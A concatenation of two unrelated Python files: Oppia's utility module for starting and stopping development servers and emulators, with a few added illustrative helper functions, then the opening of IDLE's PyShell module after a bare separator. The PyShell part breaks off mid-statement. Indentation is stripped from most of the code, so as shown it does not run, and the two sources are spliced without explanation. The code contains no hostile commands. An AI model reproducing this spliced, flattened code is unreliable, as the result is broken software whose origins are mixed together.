# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for managing server processes required by Oppia."""
from __future__ import annotations
import contextlib
import logging
import os
import re
import shutil
import signal
import subprocess
import sys
import threading
from core import feconf
from core import utils
from scripts import common
@contextlib.contextmanager
def managed_process(
command_args, human_readable_name='Process', shell=False,
timeout_secs=60, **popen_kwargs):
"""Context manager for starting and stopping a process gracefully.
Args:
command_args: list(int|str). A sequence of program arguments, where the
program to execute is the first item. Ints are allowed in order to
            accommodate e.g. port numbers.
human_readable_name: str. The human-readable name of the process. Used
by the function's logging logic to improve readability.
shell: bool. Whether the command should be run inside of its own shell.
WARNING: Executing shell commands that incorporate unsanitized input
from an untrusted source makes a program vulnerable to
[shell injection](https://w.wiki/_Ac2), a serious security flaw
which can result in arbitrary command execution. For this reason,
the use of `shell=True` is **strongly discouraged** in cases where
the command string is constructed from external input.
timeout_secs: int. The time allotted for the managed process and its
descendants to terminate themselves. After the timeout, any
remaining processes will be killed abruptly.
**popen_kwargs: dict(str: *). Same kwargs as `subprocess.Popen`.
Yields:
psutil.Process. The process managed by the context manager.
"""
# TODO(#11549): Move this to top of the file.
if common.PSUTIL_DIR not in sys.path:
sys.path.insert(1, common.PSUTIL_DIR)
import psutil
get_proc_info = lambda p: (
'%s(name="%s", pid=%d)' % (human_readable_name, p.name(), p.pid)
if p.is_running() else '%s(pid=%d)' % (human_readable_name, p.pid))
stripped_args = (('%s' % arg).strip() for arg in command_args)
non_empty_args = (s for s in stripped_args if s)
command = ' '.join(non_empty_args) if shell else list(non_empty_args)
human_readable_command = command if shell else ' '.join(command)
msg = 'Starting new %s: %s' % (human_readable_name, human_readable_command)
print(msg)
popen_proc = psutil.Popen(command, shell=shell, **popen_kwargs)
try:
yield popen_proc
finally:
print('Stopping %s...' % get_proc_info(popen_proc))
procs_still_alive = [popen_proc]
try:
if popen_proc.is_running():
# Children must be terminated before the parent, otherwise they
# may become zombie processes.
procs_still_alive = (
popen_proc.children(recursive=True) + [popen_proc])
procs_to_kill = []
for proc in procs_still_alive:
if proc.is_running():
logging.info('Terminating %s...' % get_proc_info(proc))
proc.terminate()
procs_to_kill.append(proc)
else:
logging.info('%s has already ended.' % get_proc_info(proc))
procs_gone, procs_still_alive = (
psutil.wait_procs(procs_to_kill, timeout=timeout_secs))
for proc in procs_still_alive:
logging.warning('Forced to kill %s!' % get_proc_info(proc))
proc.kill()
for proc in procs_gone:
logging.info('%s has already ended.' % get_proc_info(proc))
except Exception:
# NOTE: Raising an exception while exiting a context manager is bad
# practice, so we log and suppress exceptions instead.
logging.exception(
'Failed to stop %s gracefully!' % get_proc_info(popen_proc))
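# Illustrative sketch (added, not used by Oppia's scripts): wrapping a short-lived placeholder
# command in managed_process(). On leaving the with-block the process tree is terminated, and
# killed if it ignores the 5 second timeout.
def _example_managed_process_usage():
    with managed_process(
            ['sleep', 10], human_readable_name='Sleep Process',
            timeout_secs=5) as proc:
        print('Managed process running with pid %d' % proc.pid)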
@contextlib.contextmanager
def managed_dev_appserver(
app_yaml_path, env=None, log_level='info',
host='0.0.0.0', port=8080, admin_host='0.0.0.0', admin_port=8000,
enable_host_checking=True, automatic_restart=False,
skip_sdk_update_check=False):
"""Returns a context manager to start up and shut down a GAE dev appserver.
Args:
app_yaml_path: str. Path to the app.yaml file which defines the
structure of the server.
env: dict(str: str) or None. Defines the environment variables for the
new process.
log_level: str. The lowest log level generated by the application code
and the development server. Expected values are: debug, info,
warning, error, critical.
host: str. The host name to which the app server should bind.
port: int. The lowest port to which application modules should bind.
admin_host: str. The host name to which the admin server should bind.
admin_port: int. The port to which the admin server should bind.
enable_host_checking: bool. Whether to enforce HTTP Host checking for
application modules, API server, and admin server. Host checking
protects against DNS rebinding attacks, so only disable after
understanding the security implications.
automatic_restart: bool. Whether to restart instances automatically when
files relevant to their module are changed.
skip_sdk_update_check: bool. Whether to skip checking for SDK updates.
If false, uses .appcfg_nag to decide.
Yields:
psutil.Process. The dev_appserver process.
"""
dev_appserver_args = [
common.CURRENT_PYTHON_BIN,
common.DEV_APPSERVER_PATH,
'--host', host,
'--port', port,
'--admin_host', admin_host,
'--admin_port', admin_port,
'--enable_host_checking', 'true' if enable_host_checking else 'false',
'--automatic_restart', 'true' if automatic_restart else 'false',
'--skip_sdk_update_check', 'true' if skip_sdk_update_check else 'false',
'--log_level', log_level,
'--dev_appserver_log_level', log_level,
app_yaml_path
]
with contextlib.ExitStack() as stack:
# OK to use shell=True here because we are not passing anything that
# came from an untrusted user, only other callers of the script,
# so there's no risk of shell-injection attacks.
proc = stack.enter_context(managed_process(
dev_appserver_args,
human_readable_name='GAE Development Server',
shell=True,
env=env
))
common.wait_for_port_to_be_in_use(port)
yield proc
@contextlib.contextmanager
def managed_firebase_auth_emulator(recover_users=False):
"""Returns a context manager to manage the Firebase auth emulator.
Args:
recover_users: bool. Whether to recover users created by the previous
instance of the Firebase auth emulator.
Yields:
psutil.Process. The Firebase emulator process.
"""
emulator_args = [
common.FIREBASE_PATH, 'emulators:start', '--only', 'auth',
'--project', feconf.OPPIA_PROJECT_ID,
'--config', feconf.FIREBASE_EMULATOR_CONFIG_PATH,
]
emulator_args.extend(
['--import', common.FIREBASE_EMULATOR_CACHE_DIR, '--export-on-exit']
if recover_users else
['--export-on-exit', common.FIREBASE_EMULATOR_CACHE_DIR])
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc_context = managed_process(
emulator_args, human_readable_name='Firebase Emulator', shell=True)
with proc_context as proc:
common.wait_for_port_to_be_in_use(feconf.FIREBASE_EMULATOR_PORT)
yield proc
@contextlib.contextmanager
def managed_elasticsearch_dev_server():
"""Returns a context manager for ElasticSearch server for running tests
in development mode and running a local dev server. This is only required
in a development environment.
Yields:
psutil.Process. The ElasticSearch server process.
"""
# Clear previous data stored in the local cluster.
if os.path.exists(common.ES_PATH_DATA_DIR):
shutil.rmtree(common.ES_PATH_DATA_DIR)
# -q is the quiet flag.
es_args = ['%s/bin/elasticsearch' % common.ES_PATH, '-q']
# Override the default path to ElasticSearch config files.
es_env = {'ES_PATH_CONF': common.ES_PATH_CONFIG_DIR}
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc_context = managed_process(
es_args, human_readable_name='ElasticSearch Server', env=es_env,
shell=True)
with proc_context as proc:
common.wait_for_port_to_be_in_use(feconf.ES_LOCALHOST_PORT)
yield proc
@contextlib.contextmanager
def managed_cloud_datastore_emulator(clear_datastore=False):
"""Returns a context manager for the Cloud Datastore emulator.
Args:
clear_datastore: bool. Whether to delete the datastore's config and data
before starting the emulator.
Yields:
psutil.Process. The emulator process.
"""
emulator_hostport = '%s:%d' % (
feconf.CLOUD_DATASTORE_EMULATOR_HOST,
feconf.CLOUD_DATASTORE_EMULATOR_PORT)
emulator_args = [
common.GCLOUD_PATH, 'beta', 'emulators', 'datastore', 'start',
'--project', feconf.OPPIA_PROJECT_ID,
'--data-dir', common.CLOUD_DATASTORE_EMULATOR_DATA_DIR,
'--host-port', emulator_hostport,
'--consistency=1.0',
'--quiet'
]
if clear_datastore:
emulator_args.append('--no-store-on-disk')
with contextlib.ExitStack() as stack:
data_dir_exists = os.path.exists(
common.CLOUD_DATASTORE_EMULATOR_DATA_DIR)
if clear_datastore and data_dir_exists:
# Replace it with an empty directory.
shutil.rmtree(common.CLOUD_DATASTORE_EMULATOR_DATA_DIR)
os.makedirs(common.CLOUD_DATASTORE_EMULATOR_DATA_DIR)
elif not data_dir_exists:
os.makedirs(common.CLOUD_DATASTORE_EMULATOR_DATA_DIR)
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc = stack.enter_context(managed_process(
emulator_args, human_readable_name='Cloud Datastore Emulator',
shell=True))
common.wait_for_port_to_be_in_use(feconf.CLOUD_DATASTORE_EMULATOR_PORT)
# Environment variables required to communicate with the emulator.
stack.enter_context(common.swap_env(
'DATASTORE_DATASET', feconf.OPPIA_PROJECT_ID))
stack.enter_context(common.swap_env(
'DATASTORE_EMULATOR_HOST', emulator_hostport))
stack.enter_context(common.swap_env(
'DATASTORE_EMULATOR_HOST_PATH', '%s/datastore' % emulator_hostport))
stack.enter_context(common.swap_env(
'DATASTORE_HOST', 'http://%s' % emulator_hostport))
stack.enter_context(common.swap_env(
'DATASTORE_PROJECT_ID', feconf.OPPIA_PROJECT_ID))
stack.enter_context(common.swap_env(
'DATASTORE_USE_PROJECT_ID_AS_APP_ID', 'true'))
stack.enter_context(common.swap_env(
'GOOGLE_CLOUD_PROJECT', feconf.OPPIA_PROJECT_ID))
yield proc
@contextlib.contextmanager
def managed_redis_server():
"""Run the redis server within a context manager that ends it gracefully."""
if common.is_windows_os():
raise Exception(
'The redis command line interface is not installed because your '
'machine is on the Windows operating system. The redis server '
'cannot start.')
# Check if a redis dump file currently exists. This file contains residual
# data from a previous run of the redis server. If it exists, removes the
# dump file so that the redis server starts with a clean slate.
if os.path.exists(common.REDIS_DUMP_PATH):
os.remove(common.REDIS_DUMP_PATH)
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc_context = managed_process(
[common.REDIS_SERVER_PATH, common.REDIS_CONF_PATH],
human_readable_name='Redis Server', shell=True)
with proc_context as proc:
common.wait_for_port_to_be_in_use(feconf.REDISPORT)
try:
yield proc
finally:
subprocess.check_call([common.REDIS_CLI_PATH, 'shutdown', 'nosave'])
def create_managed_web_browser(port):
"""Returns a context manager for a web browser targeting the given port on
localhost. If a web browser cannot be opened on the current system by Oppia,
then returns None instead.
Args:
port: int. The port number to open in the web browser.
Returns:
context manager|None. The context manager to a web browser window, or
None if the current operating system does not support web browsers.
"""
url = 'http://localhost:%s/' % port
human_readable_name = 'Web Browser'
if common.is_linux_os():
if any(re.match('.*VBOX.*', d) for d in os.listdir('/dev/disk/by-id/')):
return None
else:
return managed_process(
['xdg-open', url], human_readable_name=human_readable_name)
elif common.is_mac_os():
return managed_process(
['open', url], human_readable_name=human_readable_name)
else:
return None
@contextlib.contextmanager
def managed_webpack_compiler(
config_path=None, use_prod_env=False, use_source_maps=False,
watch_mode=False, max_old_space_size=None):
"""Returns context manager to start/stop the webpack compiler gracefully.
Args:
config_path: str|None. Path to an explicit webpack config, or None to
determine it from the other args.
use_prod_env: bool. Whether to compile for use in production. Only
respected if config_path is None.
use_source_maps: bool. Whether to compile with source maps. Only
respected if config_path is None.
watch_mode: bool. Run the compiler in watch mode, which rebuilds on file
change.
max_old_space_size: int|None. Sets the max memory size of the compiler's
"old memory" section. As memory consumption approaches the limit,
the compiler will spend more time on garbage collection in an effort
to free unused memory.
Yields:
psutil.Process. The Webpack compiler process.
"""
if config_path is not None:
pass
elif use_prod_env:
config_path = (
common.WEBPACK_PROD_SOURCE_MAPS_CONFIG if use_source_maps else
common.WEBPACK_PROD_CONFIG)
else:
config_path = (
common.WEBPACK_DEV_SOURCE_MAPS_CONFIG if use_source_maps else
common.WEBPACK_DEV_CONFIG)
compiler_args = [
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH, '--config', config_path,
]
if max_old_space_size:
# NOTE: --max-old-space-size is a flag for Node.js, not the Webpack
# compiler, so we insert it immediately after NODE_BIN_PATH.
compiler_args.insert(1, '--max-old-space-size=%d' % max_old_space_size)
if watch_mode:
compiler_args.extend(['--color', '--watch', '--progress'])
with contextlib.ExitStack() as exit_stack:
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc = exit_stack.enter_context(managed_process(
compiler_args, human_readable_name='Webpack Compiler', shell=True,
# Capture compiler's output to detect when builds have completed.
stdout=subprocess.PIPE))
if watch_mode:
for line in iter(lambda: proc.stdout.readline() or None, None):
common.write_stdout_safe(line)
# Message printed when a compilation has succeeded. We break
# after the first one to ensure the site is ready to be visited.
if b'Built at: ' in line:
break
else:
# If none of the lines contained the string 'Built at',
# raise an error because a build hasn't finished successfully.
raise IOError('First build never completed')
def print_proc_output():
"""Prints the proc's output until it is exhausted."""
for line in iter(lambda: proc.stdout.readline() or None, None):
common.write_stdout_safe(line)
# Start a thread to print the rest of the compiler's output to stdout.
printer_thread = threading.Thread(target=print_proc_output)
printer_thread.start()
exit_stack.callback(printer_thread.join)
yield proc
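# Illustrative sketch (added, not used by Oppia's scripts): running a one-off dev build with
# source maps and a larger Node.js heap, then waiting for the compiler to exit.
def _example_managed_webpack_compiler_usage():
    with managed_webpack_compiler(
            use_source_maps=True, max_old_space_size=4096) as proc:
        proc.wait()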
@contextlib.contextmanager
def managed_portserver():
"""Returns context manager to start/stop the portserver gracefully.
The portserver listens at PORTSERVER_SOCKET_FILEPATH and allocates free
ports to clients. This prevents race conditions when two clients request
ports in quick succession. The local Google App Engine server that we use to
serve the development version of Oppia uses python_portpicker, which is
compatible with the portserver this function starts, to request ports.
By "compatible" we mean that python_portpicker requests a port by sending a
request consisting of the PID of the requesting process and expects a
response consisting of the allocated port number. This is the interface
provided by this portserver.
Yields:
psutil.Popen. The Popen subprocess object.
"""
# TODO(#11549): Move this to top of the file.
if common.PSUTIL_DIR not in sys.path:
# Our unit tests already configure sys.path correctly, but the
# standalone scripts do not. Because of this, the following line cannot
# be covered. This is fine since we want to cleanup this code anyway in
# #11549.
sys.path.insert(1, common.PSUTIL_DIR) # pragma: no cover
import psutil
# Check if a socket file exists. This file can exist when previous instance
# of the portserver did not close properly. We need to remove as otherwise
# the portserver will fail to start.
if os.path.exists(common.PORTSERVER_SOCKET_FILEPATH):
os.remove(common.PORTSERVER_SOCKET_FILEPATH)
portserver_args = [
'python', '-m', 'scripts.run_portserver',
'--portserver_unix_socket_address', common.PORTSERVER_SOCKET_FILEPATH,
]
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc_context = managed_process(
portserver_args, human_readable_name='Portserver', shell=True)
with proc_context as proc:
try:
yield proc
finally:
# Before exiting the proc_context, try to end the process with
# SIGINT. The portserver is configured to shut down cleanly upon
# receiving this signal.
try:
proc.send_signal(signal.SIGINT)
except OSError:
                # Raised when the process has already shut down, in which case we
# can just return immediately.
return # pylint: disable=lost-exception
else:
# Otherwise, give the portserver 10 seconds to shut down after
# sending CTRL-C (SIGINT).
try:
proc.wait(timeout=10)
except psutil.TimeoutExpired:
# If the server fails to shut down, allow proc_context to
# end it by calling terminate() and/or kill().
pass
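# Illustrative sketch (added, not used by Oppia's scripts): a rough client for the
# request/response protocol described in managed_portserver()'s docstring, i.e. send the
# requesting PID over the unix socket and read back the allocated port number. The exact
# framing used by python_portpicker may differ.
def _example_request_port_from_portserver():
    import socket
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
        sock.connect(common.PORTSERVER_SOCKET_FILEPATH)
        sock.sendall(b'%d' % os.getpid())  # request: the requesting process's PID
        response = sock.recv(1024)         # response: the allocated port number
    return int(response)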
@contextlib.contextmanager
def managed_webdriver_server(chrome_version=None):
"""Returns context manager to start/stop the Webdriver server gracefully.
This context manager updates Google Chrome before starting the server.
Args:
chrome_version: str|None. The version of Google Chrome to run the tests
on. If None, then the currently-installed version of Google Chrome
is used instead.
Yields:
psutil.Process. The Webdriver process.
"""
if chrome_version is None:
# Although there are spaces between Google and Chrome in the path, we
# don't need to escape them for Popen (as opposed to on the terminal, in
# which case we would need to escape them for the command to run).
chrome_command = (
'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
if common.is_mac_os() else 'google-chrome')
try:
output = subprocess.check_output([chrome_command, '--version'])
except OSError:
# For the error message on macOS, we need to add the backslashes in.
# This is because it is likely that a user will try to run the
# command on their terminal and, as mentioned above, the macOS
# chrome version command has spaces in the path which need to be
# escaped for successful terminal use.
raise Exception(
'Failed to execute "%s --version" command. This is used to '
'determine the chromedriver version to use. Please set the '
'chromedriver version manually using the '
'--chrome_driver_version flag. To determine the '
'chromedriver version to be used, please follow the '
'instructions mentioned in the following URL:\n'
'https://chromedriver.chromium.org/downloads/version-selection'
% chrome_command.replace(' ', r'\ '))
installed_version_parts = b''.join(re.findall(rb'[0-9.]', output))
installed_version = '.'.join(
installed_version_parts.decode('utf-8').split('.')[:-1])
response = utils.url_open(
'https://chromedriver.storage.googleapis.com/LATEST_RELEASE_%s' % (
installed_version))
chrome_version = response.read().decode('utf-8')
print('\n\nCHROME VERSION: %s' % chrome_version)
subprocess.check_call([
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH, 'update',
'--versions.chrome', chrome_version,
])
with contextlib.ExitStack() as exit_stack:
if common.is_windows_os():
# NOTE: webdriver-manager (version 13.0.0) uses `os.arch()` to
# determine the architecture of the operating system, however, this
# function can only be used to determine the architecture of the
# machine that compiled `node`. In the case of Windows, we are using
# the portable version, which was compiled on `ia32` machine so that
# is the value returned by this `os.arch` function. Unfortunately,
# webdriver-manager seems to assume that Windows wouldn't run on the
            # ia32 architecture, so its helper function used to determine the
            # download link returns null, which means that the application has
            # no idea where to download the correct version from.
#
# https://github.com/angular/webdriver-manager/blob/b7539a5a3897a8a76abae7245f0de8175718b142/lib/provider/chromedriver.ts#L16
# https://github.com/angular/webdriver-manager/blob/b7539a5a3897a8a76abae7245f0de8175718b142/lib/provider/geckodriver.ts#L21
# https://github.com/angular/webdriver-manager/blob/b7539a5a3897a8a76abae7245f0de8175718b142/lib/provider/chromedriver.ts#L167
# https://github.com/nodejs/node/issues/17036
regex_pattern = re.escape('this.osArch = os.arch();')
arch = 'x64' if common.is_x64_architecture() else 'x86'
replacement_string = 'this.osArch = "%s";' % arch
exit_stack.enter_context(common.inplace_replace_file_context(
common.CHROME_PROVIDER_FILE_PATH, regex_pattern,
replacement_string))
exit_stack.enter_context(common.inplace_replace_file_context(
common.GECKO_PROVIDER_FILE_PATH, regex_pattern,
replacement_string))
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc = exit_stack.enter_context(managed_process([
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH, 'start',
'--versions.chrome', chrome_version, '--quiet', '--standalone',
], human_readable_name='Webdriver manager', shell=True))
common.wait_for_port_to_be_in_use(4444)
yield proc
@contextlib.contextmanager
def managed_protractor_server(
suite_name='full', dev_mode=True, debug_mode=False,
sharding_instances=1, **kwargs):
"""Returns context manager to start/stop the Protractor server gracefully.
Args:
suite_name: str. The suite name whose tests should be run. If the value
is `full`, all tests will run.
dev_mode: bool. Whether the test is running on dev_mode.
debug_mode: bool. Whether to run the protractor tests in debugging mode.
Read the following instructions to learn how to run e2e tests in
debugging mode:
https://www.protractortest.org/#/debugging#disabled-control-flow.
sharding_instances: int. How many sharding instances to be running.
**kwargs: dict(str: *). Keyword arguments passed to psutil.Popen.
Yields:
psutil.Process. The protractor process.
"""
if sharding_instances <= 0:
raise ValueError('Sharding instance should be larger than 0')
protractor_args = [
common.NODE_BIN_PATH,
# This flag ensures tests fail if the `waitFor()` calls time out.
'--unhandled-rejections=strict',
common.PROTRACTOR_BIN_PATH, common.PROTRACTOR_CONFIG_FILE_PATH,
'--params.devMode=%s' % dev_mode,
'--suite', suite_name,
]
if debug_mode:
# NOTE: This is a flag for Node.js, not Protractor, so we insert it
# immediately after NODE_BIN_PATH.
protractor_args.insert(1, '--inspect-brk')
if sharding_instances > 1:
protractor_args.extend([
'--capabilities.shardTestFiles=True',
'--capabilities.maxInstances=%d' % sharding_instances,
])
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
managed_protractor_proc = managed_process(
protractor_args, human_readable_name='Protractor Server', shell=True,
**kwargs)
with managed_protractor_proc as proc:
yield proc
|
PyShell.py
|
#! /usr/bin/env python3
import getopt
import os
import os.path
import re
import socket
import subprocess
import sys
import threading
import time
import tokenize
import traceback
import types
import io
import linecache
from code import InteractiveInterpreter
from platform import python_version, system
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
sys.exit(1)
import tkinter.messagebox as tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import idlever
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
import warnings
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way."""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += " %s\n" % line
s += "%s: %s\n" % (category.__name__, message)
return s
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
    which can be None, the capture of the consequent AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.GetOption('main','Theme','name')
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
